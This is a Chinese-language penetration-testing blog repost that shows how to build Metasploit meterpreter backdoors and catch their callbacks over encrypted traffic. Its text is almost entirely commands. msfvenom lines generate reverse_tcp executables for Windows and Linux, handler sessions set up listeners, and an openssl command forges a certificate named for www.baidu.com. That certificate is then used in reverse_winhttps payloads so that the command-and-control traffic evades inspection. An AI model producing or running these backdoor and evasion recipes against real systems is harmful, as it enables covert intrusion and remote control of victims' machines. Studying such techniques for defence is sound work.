MSF监听之加密流量下的后门上线
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
#本文作者:Drunkbaby, 转载自FreeBuf。
原文链接:https://www.freebuf.com/articles/network/333934.html
仅供技术分享交流学习,侵权请联系我们删除。
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/11653579621.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/11653579621.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/01653579622-1.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/61653579623.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/11653579621.png)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12377 -f exe > yun.exe
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/41653579624.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/51653579625.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/51653579626.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/21653579627.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/61653579627.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/101653579628.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/101653579629.png)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12399 -f elf > yun.elf
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/61653579630.png)
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.86.2
lhost => 192.168.86.2
msf5 exploit(multi/handler) > set lport 12399
lport => 12399
msf5 exploit(multi/handler) >
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/51653579630.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/11653579631.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/01653579631.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/61653579627.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/41653579633.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/01653579633.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/11653579621.png)
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com"
-keyout www.baidu.com.key
-out www.baidu.com.crt &&
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem &&
rm -f www.baidu.com.key www.baidu.com.crt
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/51653579634.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/31653579635.png)
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.exe
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/01653579636.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/61653579636.png)
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.bat
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/101653579637.png)
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_winhttps
payload => windows/x64/meterpreter/reverse_winhttps
msf5 exploit(multi/handler) > set lhost 192.168.86.2
lhost => 192.168.86.2
msf5 exploit(multi/handler) > set lport 4433
lport => 4433
msf5 exploit(multi/handler) > set handlersslcert www.baidu.com.pem
handlersslcert => www.baidu.com.pem
msf5 exploit(multi/handler) > set stagerverifysslcert true
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/21653579638.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/51653579638.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/51653579639.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/71653579640.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/91653579640.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/61653579627.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/31653579642.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/101653579642.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/21653579643.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/11653579621.png)
![MSF监听之加密流量下的后门上线](http://www.moonsec.com/wp-content/uploads/2022/05/21653579644.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/5460.html